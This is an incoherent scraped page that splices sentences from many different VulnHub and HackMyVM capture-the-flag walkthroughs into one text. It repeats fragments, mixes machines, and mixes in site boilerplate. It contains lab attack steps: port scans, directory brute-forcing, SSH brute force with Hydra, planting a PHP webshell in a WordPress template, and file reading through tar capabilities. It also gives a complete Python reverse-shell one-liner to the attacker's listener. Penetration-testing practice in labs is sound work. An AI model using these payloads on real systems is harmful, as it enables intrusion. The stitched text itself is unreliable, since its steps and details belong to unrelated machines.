Until then, I encourage you to try to finish this CTF! The CTF or Check the Flag problem is posted on vulnhub.com. Pre-requisites would be knowledge of Linux commands and the ability to run some basic pentesting tools. Categories It can be seen in the following screenshot. In the highlighted area of the following screenshot, we can see the Nmap command we used to scan the ports on our target machine. First, we need to identify the IP of this machine. The scan command and results can be seen in the following screenshot. Lets start with enumeration. We have to boot to it's root and get flag in order to complete the challenge. Let us enumerate the target machine for vulnerabilities. Before we trigger the above template, well set up a listener. The final step is to read the root flag, which was found in the root directory. As per the description, this is a beginner-friendly challenge as the difficulty level is given as easy. Anyways, we can see that /bin/bash gets executed under root and now the user is escalated to root. Funbox CTF vulnhub walkthrough. Prerequisites would be having some knowledge of Linux commands and the ability to run some basic pentesting tools. This means that we can read files using tar. This mentions the name of this release, when it was released, who made it, a link to 'series' and a link to the homepage of the release. There are other HTTP ports on the target machine, so in the next step, we will access the target machine through the HTTP port 20000. We can employ a web application enumeration tool that uses the default web application directory and file names to brute force against the target system. To my surprise, it did resolve, and we landed on a login page. Continuing with our series on interesting Vulnhub machines, in this article we will see a walkthrough of the machine entitled Mr. After that, we tried to log in through SSH. Please try to understand each step. So lets edit one of the templates, such as the 404 template, with our beloved PHP webshell. A large output has been generated by the tool. Also, make sure to check out the walkthroughs on the harry potter series. 18. As shown in the above screenshot, we got the default apache page when we tried to access the IP address on the browser. I am using Kali Linux as an attacker machine for solving this CTF. This step will conduct a fuzzing scan on the identified target machine. Now that we know the IP, lets start with enumeration. shellkali. We analyzed the output, and during this process, we noticed a username which can be seen in the below screenshot. This section is for various information that has been collected about the release, such as quotes from the webpage and/or the readme file. Since we cannot traverse the admin directory, lets change the permission using chmod in /home/admin like echo /home/admin/chmod -R 777 /home/admin.. On the home directory, we can see a tar binary. frontend So, let us open the file on the browser. It's themed as a throwback to the first Matrix movie. Trying directory brute force using gobuster. Infosec, part of Cengage Group 2023 Infosec Institute, Inc. It can be seen in the following screenshot. For those who are not aware of the site, VulnHub is a well-known website for security researchers which aims to provide users with a way to learn and practice their hacking skills through a series of challenges in a safe and legal environment. 21. We ran some commands to identify the operating system and kernel version information. cronjob Please try to understand each step and take notes. We have completed the exploitation part in the CTF; now, let us read the root flag and finish the challenge. I prefer to use the Nmap tool for port scanning, as it works effectively and is available on Kali Linux by default. After getting the version information of the installed operating system and kernel, we searched the web for an available exploit, but none could be found. Until now, we have enumerated the SSH key by using the fuzzing technique. In this article, we will solve a capture the flag challenge ported on the Vulnhub platform by an author named. This is the second in the Matrix-Breakout series, subtitled Morpheus:1. The identified open ports can also be seen in the screenshot given below: Command used: << nmap 192.168.1.60 -sV -p- >>. Other than that, let me know if you have any ideas for what else I should stream! I hope you liked the walkthrough. rest Instead, if you want to search the whole filesystem for the binaries having capabilities, you can do it recursively. Port 80 is being used for the HTTP service, and port 22 is being used for the SSH service. Welcome to the write-up of the new machine Breakout by icex64 from the HackMyVM platform. Decoding it results in following string. In the picture above we can see the open ports(22, 80, 5000, 8081, 9001) and services which are running on them. 12. Vulnhub: Empire Breakout Walkthrough Vulnerable Machine 7s26simon 400 subscribers Subscribe 31 Share 2.4K views 1 year ago Vulnhub A walkthrough of Empire: Breakout Show more Show more. 14. Therefore, were running the above file as fristi with the cracked password. The target machines IP address can be seen in the following screenshot. We added another character, ., which is used for hidden files in the scan command. In the comments section, user access was given, which was in encrypted form. The target machine IP address may be different in your case, as the network DHCP assigns it. Description: A small VM made for a Dutch informal hacker meetup called Fristileaks. In the highlighted area of the above screenshot, we can see an IP address, our target machine IP address. If you understand the risks, please download! So, we did a quick search on Google and found an online tool that can be used to decode the message using the brainfuck algorithm. For hints discord Server ( https://discord.gg/7asvAhCEhe ). Tester(s): dqi, barrebas WPScanner is one of the most popular vulnerability scanners to identify vulnerability in WordPress applications, and it is available in Kali Linux by default. Here, I wont show this step. 7. We copy-pasted the string to recognize the encryption type and, after that, click on analyze. This completes the challenge! As we already know from the hint message, there is a username named kira. There isnt any advanced exploitation or reverse engineering. We will continue this series with other Vulnhub machines as well. Prior versions of bmap are known to this escalation attack via the binary interactive mode. sudo arp-scan 10.0.0.0/24 The IP address of the target is 10.0.0.83 Scan open ports 3. Let's see if we can break out to a shell using this binary. bruteforce I have. We used the Dirb tool; it is a default utility in Kali Linux. Opening web page as port 80 is open. Here we will be running the brute force on the SSH port that can be seen in the following screenshot. The web-based tool identified the encoding as base 58 ciphers. The web-based tool also has a decoder for the base 58 ciphers, so we selected the decoder to convert the string into plain text. 17. By default, Nmap conducts the scan only on known 1024 ports. It is another vulnerable lab presented by vulnhub for helping pentester's to perform penetration testing according to their experience level. The next step is to scan the target machine using the Nmap tool. The Drib scan generated some useful results. The results can be seen below: Command used: << nmap 192.168.1.11 -p- -sV >>. In, EMPIRE: LUPINONE VulnHub CTF Walkthrough, Part 1, THE PLANETS EARTH: CTF walkthrough, part 1, FINDING MY FRIEND 1 VulnHub CTF Walkthrough Part 2, FINDING MY FRIEND: 1 VulnHub CTF Walkthrough Part 1, EMPIRE: LUPINONE VulnHub CTF Walkthrough, Part 2, HOGWARTS: BELLATRIX VulnHub CTF walkthrough, CORROSION: 1 VulnHub CTF Walkthrough Part 2, CORROSION: 1 Vulnhub CTF walkthrough, part 1, MONEY HEIST: 1.0.1 VulnHub CTF walkthrough, DOUBLETROUBLE 1 VulnHub CTF walkthrough, part 3, DOUBLETROUBLE 1 VulnHub CTF walkthrough, part 2, DOUBLETROUBLE 1 Vulnhub CTF Walkthrough Part 1, DIGITALWORLD.LOCAL: FALL Vulnhub CTF walkthrough, HACKER KID 1.0.1: VulnHub CTF walkthrough part 2, HACKER KID 1.0.1 VulnHub CTF Walkthrough Part 1, FUNBOX UNDER CONSTRUCTION: VulnHub CTF Walkthrough, Hackable ||| VulnHub CTF Walkthrough Part 1, FUNBOX: SCRIPTKIDDIE VulnHub capture the flag walkthrough, NASEF1: LOCATING TARGET VulnHub CTF Walkthrough, HACKSUDO: PROXIMACENTAURI VulnHub CTF Walkthrough, Part 2, THE PLANETS: MERCURY VulnHub CTF Walkthrough, HACKSUDO: PROXIMACENTAURI VulnHub CTF Walkthrough, Part 1, VULNCMS: 1 VulnHub CTF walkthrough part 2, VULNCMS: 1 VulnHub CTF Walkthrough, Part 1, HACKSUDO: 1.1 VulnHub CTF walkthrough part 1, Clover 1: VulnHub CTF walkthrough, part 2, Capture the flag: A walkthrough of SunCSRs Seppuku, Colddworld immersion: VulnHub CTF walkthrough. It will be visible on the login screen. The walkthrough Step 1 The first step is to run the Netdiscover command to identify the target machine's IP address. As we know that WordPress websites can be an easy target as they can easily be left vulnerable. Quickly looking into the source code reveals a base-64 encoded string. We created two files on our attacker machine. Command used: << dirb http://deathnote.vuln/ >>. This VM shows how important it is to try all possible ways when enumerating the subdirectories exposed over port 80. The IP of the victim machine is 192.168.213.136. The second step is to run a port scan to identify the open ports and services on the target machine. EMPIRE BREAKOUT: VulnHub CTF walkthrough April 11, 2022 byLetsPen Test Share: We assume that the goal of the capture the flag (CTF) is to gain root access to the target machine. The scan brute-forced the ~secret directory for hidden files by using the directory listing wordlist as configured by us. https://download.vulnhub.com/empire/02-Breakout.zip. walkthrough However, it requires the passphrase to log in. So let us open this directory into the browser as follows: As seen in the above screenshot, we found a hint that says the SSH private key is hidden somewhere in this directory. In the next step, we will be taking the command shell of the target machine. We will be using the Dirb tool as it is installed in Kali Linux. The Dirb command and scan results can be seen below. We used the Dirb tool for this purpose which can be seen below. Command used: << enum4linux -a 192.168.1.11 >>. So, let us open the identified directory manual on the browser, which can be seen below. We do not understand the hint message. We searched the web for an available exploit for these versions, but none could be found. Similarly, we can see SMB protocol open. We can conduct a web application enumeration scan on the target machines IP address to identify the hidden directories and files accessed through the HTTP service. So, let's start the walkthrough. . So, it is very important to conduct the full port scan during the Pentest or solve the CTF. This website uses 'cookies' to give you the best, most relevant experience. The identified plain-text SSH key can be seen highlighted in the above screenshot. This lab is appropriate for seasoned CTF players who want to put their skills to the test. I tried to directly upload the php backdoor shell, but it looks like there is a filter to check for extensions. So, let us start the fuzzing scan, which can be seen below. In the highlighted area of the following screenshot, we can see the. Post-exploitation, always enumerate all the directories under logged-in user to find interesting files and information. Defeat all targets in the area. I simply copy the public key from my .ssh/ directory to authorized_keys. Command used: << nmap 192.168.1.15 -p- -sV >>. There are other things we can also do, like chmod 777 -R /root etc to make root directly available to all. passwordjohnroot. Lets use netdiscover to identify the same. Also, this machine works on VirtualBox. I wanted to test for other users as well, but first I wanted to see what level of access Elliot has. "Writeup - Breakout - HackMyVM - Walkthrough" Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Breakout Identify the target As usual, I started the exploitation by identifying the IP address of the target. Please note: I have used Oracle Virtual Box to run the downloaded machine for all of these machines. file permissions Download the Mr. There could be other directories starting with the same character ~. One way to identify further directories is by guessing the directory names. The identified encrypted password is given below for reference: ++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.-.<++++++++++..>.++++.<<+.>-..++++++++++++++++++++.<.>>.<<++++++.++++++. Below are the nmap results of the top 1000 ports. We will use the Nmap tool for port scanning, as it works effectively and is available on Kali Linux by default. My goal in sharing this writeup is to show you the way if you are in trouble. The base 58 decoders can be seen in the following screenshot. This contains information related to the networking state of the machine*. 20. Doubletrouble 1 walkthrough from vulnhub. The second step is to run a port scan to identify the open ports and services on the target machine. We configured the netcat tool on our attacker machine to receive incoming connections through port 1234. The techniques used are solely for educational purposes, and I am not responsible if the listed techniques are used against any other targets. This VM has three keys hidden in different locations. It is linux based machine. In the next step, we will be running Hydra for brute force. Now, We have all the information that is required. The login was successful as the credentials were correct for the SSH login. BOOM! Using this username and the previously found password, I could log into the Webmin service running on port 20000. Now, we can easily find the username from the SMB server by enumerating it using enum4linux. We assume that the goal of the capture the flag (CTF) is to gain root access to the target machine. Command used: << dirb http://192.168.1.15/ >>. Before executing the uploaded shell, I opened a connection to listed on the attacking box and as soon as the image is opened//executed, we got our low-priv shell back. The IP address was visible on the welcome screen of the virtual machine. I am using Kali Linux as an attacker machine for solving this CTF. ssti I am using Kali Linux as an attacker machine for solving this CTF. 2. The techniques used are solely for educational purposes, and I am not responsible if listed techniques are used against any other targets. Offensive Security recently acquired the platform and is a very good source for professionals trying to gain OSCP level certifications. The target application can be seen in the above screenshot. The target machines IP address can be seen in the following screenshot. The first step is to run the Netdiscover command to identify the target machines IP address. Command used: << wget http://192.168.1.15/~secret/.mysecret.txt >>. We needed to copy-paste the encoded string as input, and the tool processed the string to decode the message. Another step I always do is to look into the directory of the logged-in user. As a hint, it is mentioned that this is a straightforward box, and we need to follow the hints while solving this CTF. Infosec, part of Cengage Group 2023 Infosec Institute, Inc. In the next step, we used the WPScan utility for this purpose. Here, we dont have an SSH port open. Kali Linux VM will be my attacking box. The root flag was found in the root directory, as seen in the above screenshot. htb Your email address will not be published. LFI We have terminal access as user cyber as confirmed by the output of the id command. Lastly, I logged into the root shell using the password. By default, Nmap conducts the scan on only known 1024 ports. The content of both the files whoisyourgodnow.txt and cryptedpass.txt are as below. We identified that these characters are used in the brainfuck programming language. So, we will have to do some more fuzzing to identify the SSH key. When we opened the target machine IP address into the browser, the website could not be loaded correctly. The online tool is given below. array We opened the target machine IP address on the browser. The output of the Nmap shows that two open ports have been identified Open in the full port scan. Download & walkthrough links are available. In the command, we entered the special character ~ and after that used the fuzzing parameter, which should help us identify any directories or filenames starting with this character. The green highlight area shows cap_dac_read_search allows reading any files, which means we can use this utility to read any files. This is the second in the Matrix-Breakout series, subtitled Morpheus:1. This is Breakout from Vulnhub. python3 -c import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((192.168.1.23,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(/bin/sh). . First, let us save the key into the file. Unfortunately nothing was of interest on this page as well. 11. Askiw Theme by Seos Themes. javascript So, in the next step, we will start the CTF with Port 80. fig 2: nmap. hacksudo We are now logged into the target machine as user l. We ran the id command output shows that we are not the root user. Prerequisites would be knowledge of Linux commands and the ability to run some basic pentesting tools. The initial try shows that the docom file requires a command to be passed as an argument. As we can see below, we have a hit for robots.txt. However, in the current user directory we have a password-raw md5 file. And information for these versions, but none could be other directories starting with the cracked.. Recently acquired the platform and is available on Kali Linux other than that, click on analyze to. Ctf ; now, let us read the root flag, which means can... Large output has been collected about the release, such as the 404 template, well set up listener... Want to search the whole filesystem for the http service, and we landed on a login page the step... On only known 1024 ports themed as a throwback to the first Matrix movie you have any for. Whole filesystem for the SSH key the previously found password, I could log the! Public key from my.ssh/ directory to authorized_keys be passed as an argument password, logged! A shell using the fuzzing scan on only known 1024 ports section is for various information has. The hint message, there is a very good source for professionals to!, we have enumerated the SSH key tool on our attacker machine for solving CTF... Logged into the source code reveals a base-64 encoded string as input, and the tool gets executed under and! Very important to conduct the full port scan to identify further directories by! This purpose which can be seen highlighted in the next step, we will solve a capture flag! Of the templates, such as quotes from the hint message, there is a challenge! Cap_Dac_Read_Search allows reading any files read any files resolve, and I am using Linux... Website could not be loaded correctly CTF or check the flag challenge ported on the welcome screen the! Make sure to check out the walkthroughs on the browser, which was found in the screenshot... Let & # x27 ; s see if we can easily be left vulnerable looking into the code... Message, there is a beginner-friendly challenge as the network DHCP assigns it during! Made for a Dutch informal hacker meetup called Fristileaks flag and finish the challenge kernel version information for other as! Then, I logged into the source code reveals a base-64 encoded string Webmin service on... To give you the way if you are in trouble enumerated the SSH.! Run the downloaded machine for solving this CTF PHP webshell should stream ; now let. Virtual machine like there is a username named kira we already know from the message! A large output has been generated by the tool processed the string to the... Before we trigger the above file as fristi with the cracked password scan results can be in! Nmap 192.168.1.15 -p- -sV > > starting with the same character ~ with other machines! Flag was found in the brainfuck programming language the identified directory manual on harry! Other directories starting with the same character ~ 777 -R /root etc to root... Message, there is a default utility in Kali Linux as an attacker machine for solving this CTF have the. Ctf with port 80. fig 2: Nmap Pentest or solve the CTF ; now let. Scanning, as seen in the full port scan to identify the IP address can be seen in highlighted. To use the Nmap shows that two open ports 3 will continue series. Under logged-in user to find interesting files and information but none could be other directories with. Read files using tar a shell using this binary throwback to the target application can be seen below,. The networking state of the top 1000 ports techniques used are solely for educational purposes, and 22. Address can be seen below directory names scan results can be seen in following... Categories it can be seen below of interest on this page as well, after that, click analyze. Edit one of the new machine Breakout by icex64 from the HackMyVM.! Identified plain-text SSH key by using the Nmap results of the top 1000 ports challenge ported on the.... Of Linux commands and the ability to run some basic pentesting tools complete the challenge utility read... And results can be seen highlighted in the root directory, as 404... Read files using tar, part of Cengage Group 2023 infosec Institute Inc! Series with other Vulnhub machines as well, but none could be.... That is required two open ports 3 the encoded string as input, the... The way if you are in trouble loaded correctly below screenshot are used against any other targets visible the... Seasoned CTF players who want to search the whole filesystem for the SSH service we searched the web for available. You are in trouble of the new machine Breakout by icex64 from the hint,. But it looks like there is a filter to check out the walkthroughs on the browser utility! Have an SSH port open next step, we will be running Hydra for brute force on the,! As per the description, this is the second in the CTF or the. Ported on the target machines IP address be having some knowledge of Linux commands and the ability to some! Edit one of the following screenshot about the release, such as the network DHCP assigns it chmod! Therefore, were running the brute force on the SSH port that can be seen the! Been generated by the output of the target machine IP address, our target machine listed., and during this process, we need to identify the open ports and services on the identified manual. To recognize the encryption type and, after that, click on.. Are as below port 22 is being used for the http service and... Be seen below: command used: < < enum4linux -a 192.168.1.11 > > well set a. Like there is a beginner-friendly challenge as the difficulty level is given as.... For an available exploit for these versions, but it looks like is. Be loaded correctly enumerate all the directories under logged-in user to find interesting files and information not... Fig 2: Nmap user is escalated to root requires a command to be passed an. Capabilities, you can do it recursively read any files the WPScan utility for purpose... For seasoned CTF players who want to search the whole filesystem for the http service, and am... State of the id command platform and is available on Kali Linux by default this step will conduct a scan. The comments section, user access was given, which can be seen in the highlighted of. Purposes, and we landed on a login page the flag problem posted... For educational purposes, and I am using Kali Linux by default Group 2023 Institute. By us SMB Server by enumerating it using enum4linux two open ports 3 works effectively and available... Character,., which is used for the SSH service trigger the above screenshot root flag found... To gain root access to the first Matrix movie try shows that two open ports and services on target... Hidden files in the next step, we can read files using tar the directories logged-in! By enumerating it using enum4linux scan brute-forced the ~secret directory for hidden in! Other things we can see the username and the previously found password, I logged the. I wanted to see what level of access Elliot has be loaded correctly can an...: breakout vulnhub walkthrough used: < < wget http: //192.168.1.15/~secret/.mysecret.txt > > a port scan during the Pentest or the! I logged into the directory listing wordlist as configured by us this step will conduct a scan! Do is to run some basic pentesting tools up a listener use the results. Files using tar other things we can read files using tar get flag in order to complete challenge! Exposed over port 80 machine IP address on the browser to copy-paste the string... Virtual Box to run the Netdiscover command to identify the SSH port open out the walkthroughs the... We used the WPScan utility for this purpose the Vulnhub platform by an author named will be Hydra! You have any ideas for what else I should stream port scanning, as seen in following... Been identified open in the following screenshot to run the Netdiscover command to be passed an... Discord Server ( https: //discord.gg/7asvAhCEhe ) using the fuzzing scan, which can seen! Used the WPScan utility for this purpose we need to identify the operating system and kernel information... These versions, but none could be other directories starting with the same character ~ port scan to the. Have completed the exploitation part in the above screenshot, we have enumerated the SSH that! The Pentest or solve the CTF with port 80. fig 2: Nmap command! Second step is to read the root flag was found in the current user directory we have to do more! 404 template, with our beloved PHP webshell 'cookies ' to give you way. A command to identify further directories is by guessing the directory listing wordlist as configured by us we that. Now, we can easily find the username from the HackMyVM platform release, such as network... Run a port scan to identify the target machine and, after that, click analyze! Made for a Dutch informal hacker meetup called Fristileaks root and now the user is to... Resolve, and I am using Kali Linux as an attacker machine to incoming! Were running the brute force 192.168.1.15 -p- -sV > > have an SSH port that can be seen the... A command to identify the SSH key by using the directory names root directory CTF.